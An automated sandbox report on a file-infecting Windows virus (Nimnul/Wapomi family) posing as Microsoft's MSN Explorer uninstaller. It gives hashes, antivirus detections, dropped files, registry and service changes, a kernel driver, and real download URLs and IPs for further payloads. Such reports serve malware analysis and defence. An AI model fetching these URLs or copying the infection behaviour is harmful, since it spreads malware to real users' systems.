Analysis Date | 2015-08-28 11:28:44 |
---|---|
MD5 | c068de75c6d81b8dba86fec207281428 |
SHA1 | 36ec020aa19e25a133a1d5a9f63d48a81bdd0f83 |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: c02003b9f50c63f6a112afcee0c8057e sha1: 7a491315e9fb929b216e9d249e0b05bee0c28465 size: 16384 | |
Section | .data md5: 2395a14b242238675b3a7322d039eb97 sha1: 9221e044437a07c96ff3c8a686e1f031edf554aa size: 4096 | |
Section | .rsrc md5: baabdff38152118699c72fc17e454372 sha1: 519883dd302e18b465fe071e2fb2957501e1d7ad size: 8192 | |
Section | !55u md5: fdb2840b38dd8eef825653987335c4db sha1: 722c49e541fb103fffe3d8d6d16abd7bb377b2c1 size: 20480 | |
Section | .tc md5: e347d822422ba661f7c3e4bf8a8b7f6f sha1: 6bf1063e8583ccbf180c94472bdff061fe1558a8 size: 28672 | |
Section | W55uj md5: 141f2f096939449412ceec1c3ad435c6 sha1: 28bec8b32534178eb04fdef99b6ac80d3629e6a9 size: 20480 | |
Timestamp | 2001-07-19 19:29:57 | |
Pdb path | pdb | |
Version | LegalCopyright: Copyright (C) Microsoft Corp. 1981-2000 InternalName: MSNUNIN FileVersion: 6.10.0016.1624 CompanyName: Microsoft Corporation Built by: msnbld ProductName: Microsoft(R) MSN (R) Communications System ProductVersion: 6.10.0016.1624 FileDescription: MSN Uninstall Progman OriginalFilename: MSNUNIN.EXE LegalCopyright: Copyright (C) Microsoft Corp. 1981-2000 InternalName: MSNUNIN FileVersion: 6.10.0016.1624 CompanyName: Microsoft Corporation Built by: msnbld ProductName: Microsoft(R) MSN (R) Communications System ProductVersion: 6.10.0016.1624 FileDescription: MSN Uninstall Progman OriginalFilename: MSNUNIN.EXE | |
PEhash | 1234840ca0de89bfdc80714a9d3a95e2890a2ea7 | |
IMPhash | 2a1c59f2822a4b9e0435e5c824306502 | |
AV | Rising | Win32.Roue.a |
AV | Mcafee | W32/Kudj |
AV | Avira (antivir) | W32/Jadtre.B |
AV | Twister | Virus.558BEC81EC@120000#.mg |
AV | Ad-Aware | Win32.VJadtre.3 |
AV | Alwil (avast) | Malware-gen:Viking-CF:Win32:Malware-gen:Win32:Viking-CF |
AV | Eset (nod32) | Win32/Wapomi.BA virus |
AV | Grisoft (avg) | Win32/Wapomi.I |
AV | Symantec | W32.Wapomi.C!inf |
AV | Fortinet | W32/Nimnul.F |
AV | BitDefender | Win32.VJadtre.3 |
AV | K7 | Virus ( 0040f7441 ) |
AV | Microsoft Security Essentials | Virus:Win32/Mikcer.B |
AV | MicroWorld (escan) | Win32.VJadtre.3 |
AV | MalwareBytes | no_virus |
AV | Authentium | W32/PatchLoad.E |
AV | Frisk (f-prot) | W32/PatchLoad.E |
AV | Ikarus | Trojan-Downloader.Win32.Small |
AV | Emsisoft | Win32.VJadtre.3 |
AV | Zillya! | Virus.Nimnul.Win32.5 |
AV | Kaspersky | Virus.Win32.Nimnul.f |
AV | Trend Micro | PE_WAPOMI.BM |
AV | CAT (quickheal) | W32.Nimnul.F1 |
AV | VirusBlokAda (vba32) | Virus.Nimnul.19209 |
AV | Padvish | no_virus |
AV | BullGuard | Win32.VJadtre.3 |
AV | Arcabit (arcavir) | Win32.VJadtre.3 |
AV | ClamAV | Win.Trojan.Downloader-64296 |
AV | Dr. Web | BackDoor.Darkshell.246 |
AV | F-Secure | Win32.VJadtre.3 |
AV | CA (E-Trust Ino) | Win32/Nimnul.A |
Runtime Details:
Screenshot | ![]() |
---|
Process
↳ C:\malware.exe
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\flYtceO.exe |
---|---|
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\vqjSfS.exe |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe |
Creates Process | C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe |
Creates Process | C:\Documents and Settings\Administrator\Local Settings\Temp\vqjSfS.exe |
Creates Process | C:\Documents and Settings\Administrator\Local Settings\Temp\flYtceO.exe |
Process
↳ C:\Program Files\Internet Explorer\iexplore.exe http://nbtj.114anhui.com/msn/163.htm?2
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState\Settings ➝ NULL |
---|---|
Registry | HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL |
Registry | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\iexplore\Type ➝ 3 |
Registry | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore\Type ➝ 4 |
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1 |
Registry | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore\Type ➝ 4 |
Registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝ 1 |
Creates File | C:\Documents and Settings\NetworkService\Favorites\desktop.ini |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Creates File | C:\Documents and Settings\NetworkService\Cookies\index.dat |
Creates File | \Device\Afd\AsyncConnectHlp |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat |
Creates File | C:\Documents and Settings\NetworkService\Favorites\Desktop.ini |
Creates File | PIPE\lsarpc |
Creates File | \Device\Afd\Endpoint |
Creates Mutex | Shell.CMruPidlList |
Winsock DNS | nbtj.114anhui.com |
Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Creates File | C:\WINDOWS\system32\dllcache\lsasvc.dll |
---|---|
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe |
Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\vqjSfS.exe
Registry | HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL |
---|---|
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1 |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe |
Creates File | C:\Program Files\MSN\MSNCoreFiles\Install\msnsusii.exe |
Creates File | C:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Digcore.exe |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\acroaum.exe |
Creates File | C:\temp\files\vqjSfS.exe |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\setup.exe |
Creates File | C:\temp\files\malware.exe |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\instmsiw.exe |
Creates File | PIPE\lsarpc |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Msncli.exe |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32Info.exe |
Winsock DNS | ddos.dnsnb8.net |
Winsock URL | http://ddos.dnsnb8.net:799/cj//k1.rar |
Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates File | PIPE\SfcApi |
---|---|
Creates File | PIPE\wkssvc |
Creates File | C:\WINDOWS\system32\qmgr.dll |
Creates File | C:\WINDOWS\system32\mspmsnsv.dll |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat |
Creates Process | "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat" |
Starts Service | WmdmPmSN |
Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\flYtceO.exe
Registry | HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL |
---|---|
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1 |
Creates File | C:\temp\files\AcroRd32.exe |
Creates File | C:\temp\files\AcroRd32Info.exe |
Creates File | C:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Digcore.exe |
Creates File | C:\temp\files\setup.exe |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\setup.exe |
Creates File | C:\temp\files\instmsiw.exe |
Creates File | C:\temp\files\malware.exe |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\instmsiw.exe |
Creates File | C:\temp\files\reader_sl.exe |
Creates File | PIPE\lsarpc |
Creates File | C:\temp\files\Digcore.exe |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32Info.exe |
Creates File | C:\temp\files\msnsusii.exe |
Creates File | C:\temp\files\AdobeUpdateManager.exe |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe |
Creates File | C:\temp\files\flYtceO.exe |
Creates File | C:\Program Files\MSN\MSNCoreFiles\Install\msnsusii.exe |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\acroaum.exe |
Creates File | C:\temp\files\vqjSfS.exe |
Creates File | C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe |
Creates File | C:\temp\files\monitor.exe |
Creates File | C:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Msncli.exe |
Creates File | C:\temp\files\Msncli.exe |
Creates File | C:\temp\files\acroaum.exe |
Winsock DNS | ddos.dnsnb8.net |
Winsock URL | http://ddos.dnsnb8.net:799/cj//k1.rar |
Process
↳ C:\WINDOWS\system32\svchost.exe
Creates File | PIPE\lsarpc |
---|---|
Creates File | \Device\Afd\Endpoint |
Process
↳ Pid 812
Process
↳ Pid 860
Process
↳ C:\WINDOWS\System32\svchost.exe
Registry | HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL |
---|---|
Registry | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝ 2 |
Registry | HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL |
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1 |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\G56V8XAH\desktop.ini |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\ODE345I7\desktop.ini |
Creates File | NtHid |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Creates File | C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG |
Creates File | C:\Documents and Settings\NetworkService\Cookies\index.dat |
Creates File | \Device\Afd\AsyncConnectHlp |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\YSKU8U0B\desktop.ini |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\WINDOWS\TEMP\NtHid.sys |
Creates File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\9WG0YPJS\desktop.ini |
Creates File | C:\WINDOWS\system32\WBEM\Logs\wbemess.log |
Deletes File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini |
Deletes File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini |
Deletes File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini |
Deletes File | C:\WINDOWS\TEMP\NtHid.sys |
Deletes File | C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini |
Creates Process | C:\Program Files\Internet Explorer\iexplore.exe http://nbtj.114anhui.com/msn/163.htm?2 |
Creates Mutex | c:!documents and settings!networkservice!local settings!history!history.ie5! |
Creates Mutex | c:!documents and settings!networkservice!cookies! |
Creates Mutex | c:!documents and settings!networkservice!local settings!temporary internet files!content.ie5! |
Creates Service | NtHid - C:\WINDOWS\TEMP\NtHid.sys |
Winsock DNS | 141.8.226.14 |
Winsock DNS | www.490a-B8B5-9B8C1E870B0C.com |
Winsock DNS | www.baidu.com |
Winsock DNS | pc1.114central.com |
Winsock URL | http://141.8.226.14/ko/03.exe |
Winsock URL | http://141.8.226.14/ko/02.exe |
Process
↳ Pid 1216
Process
↳ C:\WINDOWS\system32\spoolsv.exe
Process
↳ Pid 1872
Process
↳ Pid 1160
Network Details:
DNS | nbtj.114anhui.com Type: A 193.166.255.171 |
---|---|
DNS | www.a.shifen.com Type: A 103.235.46.39 |
DNS | pc1.114central.com Type: A 141.8.226.14 |
DNS | ddos.dnsnb8.net Type: A |
DNS | www.baidu.com Type: A |
DNS | www.490a-B8B5-9B8C1E870B0C.com Type: A |
HTTP GET | http://141.8.226.14/ko/01.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) |
HTTP GET | http://nbtj.114anhui.com/msn/163.htm?2 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) |
HTTP GET | http://141.8.226.14/ko/02.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) |
HTTP GET | http://141.8.226.14/ko/03.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) |
Flows TCP | 192.168.1.1:1037 ➝ 141.8.226.14:80 |
Flows TCP | 192.168.1.1:1039 ➝ 193.166.255.171:80 |
Flows TCP | 192.168.1.1:1040 ➝ 141.8.226.14:80 |
Flows TCP | 192.168.1.1:1041 ➝ 141.8.226.14:80 |
Raw Pcap
0x00000000 (00000) 47455420 2f6b6f2f 30312e65 78652048 GET /ko/01.exe H 0x00000010 (00016) 5454502f 312e300d 0a416363 6570743a TTP/1.0..Accept: 0x00000020 (00032) 202a2f2a 0d0a5573 65722d41 67656e74 */*..User-Agent 0x00000030 (00048) 3a204d6f 7a696c6c 612f342e 30202863 : Mozilla/4.0 (c 0x00000040 (00064) 6f6d7061 7469626c 653b204d 53494520 ompatible; MSIE 0x00000050 (00080) 362e303b 2057696e 646f7773 204e5420 6.0; Windows NT 0x00000060 (00096) 352e313b 20535631 3b202e4e 45542043 5.1; SV1; .NET C 0x00000070 (00112) 4c522032 2e302e35 30373237 290d0a48 LR 2.0.50727)..H 0x00000080 (00128) 6f73743a 20313431 2e382e32 32362e31 ost: 141.8.226.1 0x00000090 (00144) 340d0a43 6f6e6e65 6374696f 6e3a204b 4..Connection: K 0x000000a0 (00160) 6565702d 416c6976 650d0a0d 0a eep-Alive.... 0x00000000 (00000) 47455420 2f6d736e 2f313633 2e68746d GET /msn/163.htm 0x00000010 (00016) 3f322048 5454502f 312e300d 0a416363 ?2 HTTP/1.0..Acc 0x00000020 (00032) 6570743a 202a2f2a 0d0a5573 65722d41 ept: */*..User-A 0x00000030 (00048) 67656e74 3a204d6f 7a696c6c 612f342e gent: Mozilla/4. 0x00000040 (00064) 30202863 6f6d7061 7469626c 653b204d 0 (compatible; M 0x00000050 (00080) 53494520 362e303b 2057696e 646f7773 SIE 6.0; Windows 0x00000060 (00096) 204e5420 352e313b 20535631 3b202e4e NT 5.1; SV1; .N 0x00000070 (00112) 45542043 4c522032 2e302e35 30373237 ET CLR 2.0.50727 0x00000080 (00128) 290d0a48 6f73743a 206e6274 6a2e3131 )..Host: nbtj.11 0x00000090 (00144) 34616e68 75692e63 6f6d0d0a 436f6e6e 4anhui.com..Conn 0x000000a0 (00160) 65637469 6f6e3a20 4b656570 2d416c69 ection: Keep-Ali 0x000000b0 (00176) 76650d0a 0d0a ve.... 0x00000000 (00000) 47455420 2f6b6f2f 30322e65 78652048 GET /ko/02.exe H 0x00000010 (00016) 5454502f 312e300d 0a416363 6570743a TTP/1.0..Accept: 0x00000020 (00032) 202a2f2a 0d0a5573 65722d41 67656e74 */*..User-Agent 0x00000030 (00048) 3a204d6f 7a696c6c 612f342e 30202863 : Mozilla/4.0 (c 0x00000040 (00064) 6f6d7061 7469626c 653b204d 53494520 ompatible; MSIE 0x00000050 (00080) 362e303b 2057696e 646f7773 204e5420 6.0; Windows NT 0x00000060 (00096) 352e313b 20535631 3b202e4e 45542043 5.1; SV1; .NET C 0x00000070 (00112) 4c522032 2e302e35 30373237 290d0a48 LR 2.0.50727)..H 0x00000080 (00128) 6f73743a 20313431 2e382e32 32362e31 ost: 141.8.226.1 0x00000090 (00144) 340d0a43 6f6e6e65 6374696f 6e3a204b 4..Connection: K 0x000000a0 (00160) 6565702d 416c6976 650d0a0d 0a416c69 eep-Alive....Ali 0x000000b0 (00176) 76650d0a 0d0a ve.... 0x00000000 (00000) 47455420 2f6b6f2f 30332e65 78652048 GET /ko/03.exe H 0x00000010 (00016) 5454502f 312e300d 0a416363 6570743a TTP/1.0..Accept: 0x00000020 (00032) 202a2f2a 0d0a5573 65722d41 67656e74 */*..User-Agent 0x00000030 (00048) 3a204d6f 7a696c6c 612f342e 30202863 : Mozilla/4.0 (c 0x00000040 (00064) 6f6d7061 7469626c 653b204d 53494520 ompatible; MSIE 0x00000050 (00080) 362e303b 2057696e 646f7773 204e5420 6.0; Windows NT 0x00000060 (00096) 352e313b 20535631 3b202e4e 45542043 5.1; SV1; .NET C 0x00000070 (00112) 4c522032 2e302e35 30373237 290d0a48 LR 2.0.50727)..H 0x00000080 (00128) 6f73743a 20313431 2e382e32 32362e31 ost: 141.8.226.1 0x00000090 (00144) 340d0a43 6f6e6e65 6374696f 6e3a204b 4..Connection: K 0x000000a0 (00160) 6565702d 416c6976 650d0a0d 0a416c69 eep-Alive....Ali 0x000000b0 (00176) 76650d0a 0d0a ve....
Strings
\\ X f ...... f 000004E4 040904B0 6.10.0016.1624 Add or Remove Programs Add/Remove Programs Add/Remove Programs PropertiesqYou do not have administrator privileges on this computer. Please have the administrator uninstall this program. Built by Click Cancel to close it yourself. Click OK to have Uninstall close it for you. CompanyName Copyright (C) Microsoft Corp. 1981-2000 Do you want to restart your computer now? Do you want to uninstall MSN Explorer? ERROR: "%s" doesn't exist. FILE FileDescription FileVersion InternalName LegalCopyright Microsoft Corporation Microsoft(R) MSN (R) Communications System msnbld MSN Explorer Uninstall MSN Setup is already running. MSNUNIN MSNUNIN.EXE MSN Uninstall Progman MS Shell Dlg Note: For information about how to connect to the Internet or use your e-mail, please open "Important MSN Explorer Information" on your Desktop. One moment while the programs shut down... OriginalFilename Please wait while MSN Explorer Uninstall prepares to run... ProductName ProductVersion StringFileInfo Translation Uninstall has detected that MSN Explorer is running. Uninstalling MSN Explorer will not cancel your account with your Internet Service Provider. However, if you signed up for dial-up Internet access using MSN Explorer or upgraded an existing MSN dial-up account then you may no longer be able to connect to the Internet after uninstalling. Uninstall is complete. Uninstall is complete.uYou must restart your computer before the new settings will take effect. VarFileInfo VS_VERSION_INFO 0+020e0k0 0,0A0^0s0 08101BB (08@P`p 0j/0@0E0R0f0 0T0X0\0`0d0h0l0p0t0x0| 0xIJD/ 1=>=F= :1G1P1]1 1K1Z1h1 ?%?2?]? 2(2B2N2W2c2n 2<2Q{h2p2 2?3H3Q 2D2J2O2U2b1n2t2 >2>E>S>\>s> 2K2f2v2 2M+-'3 2T2d2{2 ??2@YAPAXI@Z #32770 3$30l3Xk 343=3B3j3p3|3 *37}Cg ;3D;H;L @3T3e3 4&414]4 4%4+4G4 490a-B8B5-9 49-E88E-4c47-98DC 4aaf-A336-C255 4Q5e5x 5!6&6/6 )56Ab5t5 ;!;+;5;?;C;J; :5:F:Y:w:|: 6.6:6C6M6W6\6 6<6]6i6 6!71767D7R7^7i7p7 7.{645FF040 7FC663 7@ip:K ?7N7T7] 8 [[@ 8-00AA @.&'85 >!>*>8>B>H>V>`> 9*:/$: 954E}K 9 @5EF @\96DBA2^ 9 9[9`9g9m9s9~9 9&9/9>9Q9e -9;9A9F9 9ao^@q 9.:U:p:}: A4J4Y4_4 A67-586 .adata Add or Remove Programs Add/Remove Programs Add/Remove Programs Properties AdjustTokenPrivileges advapi32.dll ADVAPI32.dll advpack.dll AE4C57' agX \s AllocateAndInitializeSid a Play appmgmts.dlld .aspack au.ini .BAK.{FEC69D39-ADBA-4928-98F0-3571AA97ABDF} {BB7E11D6-5E67-4005-A530-ED1831D6A427} "bd WVS BefJ<Z0 bgTLOkN BrandID brand.ini browser C1E870B0C CancelConne cannot be run i CharNextA CharPrevA CharUpperA CheckTokenMembership CloseHandle CLSIDFromString CoCreateInstance CoInitialize CopyFileA Copyro CoUninitialize CP<Z<|< CreateDialogParamA CreateFileA CreateMutexA CreateProcessA crypt'c D0H0L0PM DA-6D69-472e-8981-DBC71 `.data Ddk h$ default DefaultUninstall DefaultUninstall.W2K DeleteFileA DestroyWindow (D/fc_oL DispatchMessageA dleAu7 DllGetClassObject DOS mode. DownloadComplete D$ SUVW dU5 B~ &=,=D=v= E2<2wz E8J8O8[8`8i8o8z8 eHanu@ EnumChildWindows ep1'*"/ eParam$ EqualSid ERROR: "%s" doesn't exist. Esht*6 ExecuUA ExitProcess ExitWindowsEx Expor.exe ~f 2bY F??3@YAXP F B^^Vd f+D? D FindClose FindFirstFileA FindNextFileA FindWindowA FreeLibrary FreeSid General GetCommandLineA GetCurrentProcess GetCurrentProcessId GetExitCodeProcess GetFileAttributesA GetLastError GetModuleFileNameA GetModuleHandleA GetMuR GetPrivateProfileStringA GetProcAddress GetSystemDirectoryA GetTempFileNameA GetTempPathA GetTokenInformation GetVersionExA GetWindowsDirectoryA GetWindowThreadProcessId h1l1.T hlBT7!2 HTML Application Host Window Class Hur3'$ iD&YomH ifyTrLo igVCRT Important MSN Explorer Information.htm InfGma ingCompatibil InstallDir InstallRootDir IocSymd IsDBCSLeadByte i|tlh` IXR-!m _;i;z; -k 4/ kca:\lsa kernel32.dll KERNEL32.dll KERNEL32.DLL KEveny K:\Q.pdb`q L5PFHP7b LOADER ERROR LoadLibraryA LoadStringA LocalAlloc LocalFree logonmgr.dll LookupPrivilegeValueA lp6a J lstrcatA lstrcmpA lstrcmpiA lstrcpyA lstrcpynA lstrlenA m1\U\Kcn M:d:m: MessageBoxA MigrationComplete {mo?F& MSBLUIManager MsgWaitForMultipleObjects MSN6 ApplicationWindow MSNCPQ MSNDELL MSN Explorer Uninstall MSN Gam msn.inf msnmetal.dll MSNSetup.Mutex msnunin.pdb msnupdate!@#@.exe msvcrt.dll MSVCRT.dll MultiByteToWideChar NativeHWNDHost .NEW.{9D6EAA4F-27B2-4407-AC72-4BBD2FCB6ED1} NoPatch NT\Curr NtQu9y Nv`mG} oduluI OEMBrand OEMInf oft\Wud ole32.dll OLEAUT32.dll o@P3e4 Op-;4$ ~OPEN=- OpenProcess OpenProcessToken +OpsSCM |otB.8 ,ov\A} PathFileExistsA PeekMessageA PendingFileRenameOperations PostMessageA .PROMO.{B6C9CCDF-D1BB-4c77-A14A-8D89E8CA1D11} PSSSSSSh pVKwOf PVVVhl PWWWWWW P;Z;d;n;x; q$A3<. qidu.com #]Q)/=J QQQQQQQ QWn,n# \Ra7207 rasapi32.dll RasDeleteEntryA `.rdat[ .rdata RECYCLER RegCloseKey RegCreateKeyExA RegDeleteKeyA RegDeleteValueA RegOpenKeyExA RegQueryInfoKeyA RegQueryValueExA RegSetValueExA ReleaseMutex .reloc Remote RemoveDirectoryA RemoveOEMShortcuts RichM@ _rju@_fd -<RoA%'_h7 RtlIoU RunSetupCommand S1[1`1m1 {schedsvc SDPSRV SeShutdownPrivilege SetFileAttributesA SetupExe Setup\msnunin.exe SetupSize SetupUrl SetupVersion shell32.dll shfolder.dll SHGetFolderPathA SHGetSpecialFolderPathA shlwapi.dll SHLWAPI.dll s\mars\setup\msnunin\obj\i386\msnunin.pdb SOFTWARE\Mi Software\Microsoft\MSN Software\Microsoft\MSN6 Software\Microsoft\MSN6\Setup Software\Microsoft\MSN\SoftwareInstalled Software\Microsoft\Windows\CurrentVersion\Uninstall %s /o:%ld /p:%ld /i:"%s" Sp`FFF %s /p:%ld /i:"%s" Strings s_/UYY swsocknetman1ssdp System\CurrentControlSet\Control\Session Manager t$8SPj .tcLCI0 .textVT The ordinal %u could not be located in the dynamic link library %s The procedure entry point %s could not be located in the dynamic link library %s _This #g !This program cannot be run in DOS mode. tl`TDi ToFilnH TranslateMessage tTisrv ?%_#txg u2SSSSSS u6AQVj >"u:F@ U;MhOy uMpr.{ UninstallString Unregister.Custdial.W2K Unregister.OCXs #upnphostKn&s URLDown URLDownloadToFileA urlmon.dll user32.dll USER32.dll V3_3o3x3 V6sion\ v7Os2_qWSArcvF ;/VDA v|htcL vieAak:m VirtualAlloc VirtualFree VirtualProtect vThfad \v:.X$ W0YX0wx |w9=trW ?w"^D{ WideCharToMultiByte Windows Add/Remove Programs wininit.ini winsta0 WithTag WmdmPmSN'Fa WO$_9E Wqct q! Writea7 WriteFile WritePrivateProfileStringA wsprintfA < =x=}= /X,.CC X -ibcB" <)<.<X<i<o xmlpbS {+xN{?ODBE XPTPSW XPVSSG XRichS xwuLEwE XX; tg /;%y;~; .y!GN& |/Yr3Y *y/.uzyzuEFz8GD y%*+vp*vCpuC% /YW'RB Zh&wP}M @z}]u2o